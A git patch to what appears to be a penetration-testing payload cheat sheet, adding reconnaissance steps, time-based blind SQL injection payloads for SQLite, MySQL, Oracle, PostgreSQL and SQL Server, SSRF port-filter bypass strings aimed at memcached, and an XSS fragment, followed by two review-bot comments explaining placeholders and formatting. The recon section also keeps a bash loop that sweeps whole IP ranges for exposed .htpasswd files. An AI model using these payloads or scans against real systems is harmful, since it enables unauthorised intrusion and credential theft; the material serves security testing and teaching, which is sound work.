From bb238f730134179ef738ffcfa6f1ecf03a99ed08 Mon Sep 17 00:00:00 2001
From: swisskyrepo
Date: Sat, 7 Jan 2017 20:51:47 +0100
Subject: [PATCH] Minor Updates in SQL-SSRF-XSS
---
 Methodology_and_enumeration.md | 16 ++++++++++++++++
 SQL injection/README.md | 12 ++++++++++++
 SSRF injection/README.md | 4 ++++
 XSS injection/README.md | 8 ++++++++
 4 files changed, 40 insertions(+)
diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md
index 1d67f02e..0039afda 100644
--- a/Methodology_and_enumeration.md
+++ b/Methodology_and_enumeration.md
@@ -17,6 +17,7 @@ git clone https://github.com/danielmiessler/SecLists.git
 knockpy domain.com -w /PATH_TO_SECLISTS/Discover/DNS/subdomains-top1mil-110000.txt
 ```
+
 Using Google Dorks
 ```
 site:*.domain.com -www
@@ -24,6 +25,7 @@ site:http://domain.com ext:php
 site:http://domain.com filetype:pdf
 ```
+
 Using Jason Haddix's enumall Recon-ng script,
 ```
 git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
@@ -41,6 +43,7 @@ cd domain
 -i to feed a list of domains (can also type extra domains into the original command)
 ```
+
 * Subdomain take over using HostileSubBruteForcer
 ```
 git clone https://github.com/nahamsec/HostileSubBruteforcer
@@ -48,6 +51,7 @@ chmox +x sub_brute.rb
 ./sub_brute.rb
 ```
+
 * EyeWitness and Nmap scans from the KnockPy and enumall scans
 ```
 git clone https://github.com/ChrisTruncer/EyeWitness.git
@@ -58,6 +62,13 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git
 ./EyeWitness -f rdp.txt --rdp
 ```
+* Passive recon
+```
+Use shodan to detect similar app
+Use the wayback machine to detect forgotten endpoint
+```
+
+
 * Basic NMAP (if allowed ^^')
 ```
 sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4
@@ -71,6 +82,7 @@ sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv
 • -T4 defines the timing for the task (options are 0-5 and higher is faster)
 ```
+
 * List all the subdirectories and files
 Using DirBuster or GoBuster
@@ -86,6 +98,7 @@ More subdomain :
 gobuster -w wordlist -u URL -r -e
 ```
+
 Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois)
 ```
 #!/bin/bash
@@ -100,6 +113,7 @@ for ipa in 98.13{6..9}.{0..255}.{0..255}; do
 wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
 ```
+
 * Explore the website with a proxy (ZAP/Burp Suite)
 ```
 - Start ZAP proxy, visit the main target site and perform a Forced Browse to discover files and directories
@@ -107,6 +121,7 @@ wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
 - Explore and understand available functionality, noting areas that correspond to vulnerability types
 ```
+
 * Look for Web Vulns
 ```
 - SQLi
@@ -116,6 +131,7 @@ wget -t 1 -T 3 http://${ipa}/.htpasswd; done &
 etc
 ```
+
 * Look for private information in GitHub repos with GitRob
 ```
 git clone https://github.com/michenriksen/gitrob.git
diff --git a/SQL injection/README.md b/SQL injection/README.md
index 91be3349..1637f656 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
@@ -170,6 +170,18 @@ admin") or "1"="1"/*
 1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
+## Time based
+```
+SQLite : AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) comment: -- /**/
+MySQL/MariaDB : AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 comment: # -- /*!30100 MySQL code*/
+MySQL/MariaDB : RLIKE SLEEP([SLEEPTIME]) comment: # -- /*!30100 MySQL code*/
+MySQL/MariaDB : OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) comment: # -- /*!30100 MySQL code*/
+Oracle : AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
+PostGreSQL : AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) comment: -- /**/
+PostGreSQL : AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) comment: -- /**/
+SQL Server : IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
+```
+
 ## Polyglot injection (multicontext)
 ```
 SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index f98d7719..843432ca 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -30,5 +30,9 @@ Bypass localhost with a domain redirecting to locahost
 http://n-pn.info
 ```
+-> 11211
+localhost:+11211aaa
+localhost:00011211aaaa
+
 ## Thanks to
 *
\ No newline at end of file
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 6a0dcd94..4df3ce8a 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -294,6 +294,14 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
+foo="text ";
+
+```
+
 Bypass using an alternate way to execute an alert
 ```
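Review bot: The `[RANDNUM]`, `[RANDSTR]`, `[SLEEPTIME]` and `[INFERENCE]` tokens in the new Time based block are never defined, so a reader pasting a line as-is gets a syntax error instead of a delay; they look like sqlmap's payload templates, where the tool substitutes them at run time. A one-line legend above the fence would fix that: `Placeholders: [SLEEPTIME] = seconds to wait, [RANDNUM]/[RANDSTR] = any number/string (used to keep the comparison true), [INFERENCE] = the condition being tested.` The SQLite `RANDOMBLOB`, MySQL `BENCHMARK` and PostgreSQL `GENERATE_SERIES` entries are heavy-query delays rather than timed sleeps, so their duration scales with server load and can be confused with ordinary latency; a short caveat such as `CPU-bound fallbacks for when SLEEP()/PG_SLEEP() are unavailable — calibrate against a baseline request` would help. The `//SHA1` after the BENCHMARK payload reads as a note that `SHA1()` can replace `MD5()` rather than as part of the payload, and would be clearer in the legend than inline in the injectable string.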
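Review bot: The three new lines `-> 11211`, `localhost:+11211aaa` and `localhost:00011211aaaa` in the SSRF hunk are added with no heading or explanation and sit after the closing fence of the previous example, so they render as loose text outside any code block. They appear to be port-field tricks (a sign, leading zeros, trailing letters) for reaching a service on 11211 — presumably memcached — through a URL parser more permissive than the filter in front of it, but that is inferred rather than stated. Suggest wrapping them in their own fence under a heading such as `Bypass port filtering — lax URL parsers accept a sign, leading zeros or trailing junk in the port field (11211 = memcached by default)`, and replacing the bare `-> 11211` with that sentence.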